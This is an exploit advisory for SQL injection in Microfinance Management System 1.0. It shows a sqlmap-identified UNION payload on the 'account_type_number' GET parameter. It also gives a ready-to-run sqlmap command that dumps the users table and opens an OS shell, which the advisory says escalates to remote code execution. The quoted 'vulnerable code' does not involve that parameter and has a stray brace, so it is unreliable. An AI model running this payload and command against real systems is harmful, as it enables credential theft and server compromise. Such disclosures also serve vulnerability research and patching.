Microfinance Management System 1.0 SQL Injection

`# Title: Microfinance Management System 1.0 SQLi To Rce  
# Author: Hejap Zairy  
# Date: 24.07.2022  
# Vendor: https://www.sourcecodester.com/php/14822/microfinance-management-system.html  
# Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip  
# Reference: https://github.com/Matrix07ksa  
# Tested on: Windows, MySQL, Apache  
  
  
  
#vulnerability Code php  
  
```php  
<?php  
$sql = "SELECT count(*) AS total_account FROM account_type";  
$result = mysqli_query($conn, $sql);  
$data = mysqli_fetch_assoc($result);  
?>  
}  
```  
  
  
  
  
#Status: CRITICAL  
```  
GET parameter 'account_type_number' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y  
sqlmap identified the following injection point(s) with a total of 147 HTTP(s) requests:  
---  
Parameter: account_type_number (GET)  
Type: UNION query  
Title: MySQL UNION query (random number) - 3 columns  
Payload: account_type_number=-6015' UNION ALL SELECT 7366,CONCAT(0x716b626b71,0x4268666c6b715274794a58534f487366546e5379414951584a684459764f424451536f5a707a6a6a,0x7170707a71),7366#  
---  
  
```  
#SQLi Time to Rce  
#ُExploit   
  
  
sqlmap -u 'http://0day.gov/mims/updateaccount_type.php?account_type_number=6015' --hex --time-sec=17 --dbms=mysql --technique=u --random-agent --eta -p account_type_number -D mims -T users --dump --os-shell   
  
# Description:  
The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc  
  
# Proof and Exploit:  
https://i.imgur.com/kRcQmxO.png  
https://i.imgur.com/4RmKSom.png  
  
`